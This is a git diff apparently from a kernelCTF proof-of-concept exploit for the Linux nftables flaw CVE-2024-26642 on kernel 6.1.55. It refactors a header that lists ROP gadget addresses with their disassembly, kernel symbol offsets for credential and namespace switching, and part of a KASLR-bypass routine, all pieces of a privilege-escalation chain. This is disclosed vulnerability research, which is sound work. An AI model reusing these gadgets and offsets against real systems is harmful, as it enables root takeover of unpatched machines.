google
diff --git a/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit
-952 Bytes b/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/exploit
-952 Bytes
diff --git a/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/poc.h
-48 b/‎pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/poc.h
-48
@@ -33,84 +33,42 @@ inline static int _pin_to_cpu(int id) {
 //
 
 // ffffffff81e09097: push rdi; jmp qword ptr [rsi+0xf]; 	4c57ff660f
-u64 push_rdi_jmp_rsi_0xf = 0xffffffff81e09097;
 #define PUSH_RDI_JMP_RSI_0XF 0xffffffff81e09097
 // ffffffff8126df29: pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5c4883c4205be94c6d1901c3
-u64 pop_rsp_add_rsp_0x20_pop_rbx = 0xffffffff8126df29;
 #define POP_RSP_ADD_RSP_0X20_POP_RBX_RET 0xffffffff8126df29
 // ffffffff81251258: pop rdx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ae9223a1b01c3
-u64 pop_rdx = 0xffffffff81251258;
 #define POP_RDX_RET 0xffffffff81251258
 // ffffffff818180b4: pop rbp; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5de9c6cbbe00c3
-u64 pop_rbp = 0xffffffff818180b4;
 #define POP_RBP_RET 0xffffffff818180b4
 // ffffffff8102871c: pop rcx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	59e95ec53d01c3
-u64 pop_rcx = 0xffffffff8102871c;
 #define POP_RCX_RET 0xffffffff8102871c
 // ffffffff818344a5: push rax; jmp qword ptr [rcx]; 	50ff21
-u64 push_rax_jmp_rcx = 0xffffffff818344a5;
 #define PUSH_RAX_JMP_RCX 0xffffffff818344a5
 // ffffffff81dadf48: pop rsp; jmp qword ptr [rsi+0xf]; 	5cff660f
-u64 pop_rsp_jmp_rsi_0xf = 0xffffffff81dadf48;
 #define POP_RSP_JMP_RSI_0XF 0xffffffff81dadf48
 // ffffffff81bc9099: lea rax, [r12+rbp]; pop rbx; pop rbp; pop r12; pop r13; pop r14; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	498d042c5b5d415c415d415ee9d6bb8300c3
-u64 lea_rax_r12_plus_rbp_pop5 = 0xffffffff81bc9099;
 #define LEA_RAX_R12_PLUS_RBP_POP5_RET 0xffffffff81bc9099
 // ffffffff812f9168: pop rdi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5fe912bb1001c3
-u64 pop_rdi = 0xffffffff812f9168;
 #define POP_RDI_RET 0xffffffff812f9168
 // ffffffff8124f56d:       48 89 c7                mov    %rax,%rdi
 // ffffffff8124f570:       48 89 3d d1 b9 23 03    mov    %rdi,0x323b9d1(%rip)        # ffffffff8448af48 <vmcoreinfo_data_safecopy>
 // ffffffff8124f577:       e9 04 57 1b 01          jmp    ffffffff82404c80 <__x86_return_thunk>
-u64 mov_rdi_rax = 0xffffffff8124f56d;
 #define MOV_RDI_RAX_RET 0xffffffff8124f56d
 // ffffffff81bd1748: pop rsi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ee932358300c3
-u64 pop_rsi = 0xffffffff81bd1748;
 #define POP_RSI_RET 0xffffffff81bd1748
 // function trailer for nft_do_chain
-u64 nft_do_chain_leave = 0xffffffff81e517eb;
 #define NFT_DO_CHAIN_LEAVE 0xffffffff81e517eb
 // we use this for the fast path to copy some data from the skb into RSI
-u64 nft_payload_fast_ops = 0xffffffff82b27580;
 #define NFT_PAYLOAD_FAST_OPS 0xffffffff82b27580
-u64 find_task_by_vpid = 0xffffffff811bbe60;
 #define FIND_TASK_BY_VPID 0xffffffff811bbe60
-u64 switch_task_namespaces = 0xffffffff811c3a30;
 #define SWITCH_TASK_NAMESPACES 0xffffffff811c3a30
-u64 commit_creds = 0xffffffff811c55a0;
 #define COMMIT_CREDS 0xffffffff811c55a0
-u64 prepare_kernel_cred = 0xffffffff811c5840;
 #define PREPARE_KERNEL_CRED 0xffffffff811c5840
-u64 init_task = 0xffffffff83815a40;
 #define INIT_TASK 0xffffffff83815a40
-u64 init_nsproxy = 0xffffffff83876720;
 #define INIT_NSPROXY 0xffffffff83876720
 // ffffffff810ebbdd: add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	4881c488000000e997903101c3
-u64 add_rsp_0x88 = 0xffffffff810ebbdd;
 #define ADD_RSP_0X88_RET 0xffffffff810ebbdd
 
-#define FOR_ALL_OFFSETS(x) do { \
-    x(push_rdi_jmp_rsi_0xf); \
-    x(pop_rsp_add_rsp_0x20_pop_rbx); \
-    x(pop_rdx); \
-    x(pop_rbp); \
-    x(pop_rcx); \
-    x(push_rax_jmp_rcx); \
-    x(pop_rsp_jmp_rsi_0xf); \
-    x(lea_rax_r12_plus_rbp_pop5); \
-    x(pop_rdi); \
-    x(mov_rdi_rax); \
-    x(pop_rsi); \
-    x(add_rsp_0x88); \
-    x(nft_do_chain_leave); \
-    x(nft_payload_fast_ops); \
-    x(find_task_by_vpid); \
-    x(switch_task_namespaces); \
-    x(commit_creds); \
-    x(prepare_kernel_cred); \
-    x(init_task); \
-    x(init_nsproxy); \
-  } while(0)
 
 //
 //
@@ -678,12 +636,6 @@ int64_t bypass_kaslr(u64 base) {
     i64 off = base - 0xffffffff81000000;
     printf("kernel off: %lld\n", off);
 
-    //return off;
-    i64 diff = 0xffffffff81000000- base;
-    #define x(name) { name -= diff; printf("corrected %s to %llx\n", #name, name); }
-    FOR_ALL_OFFSETS(x);
-    #undef x
-
     return off;
 
 }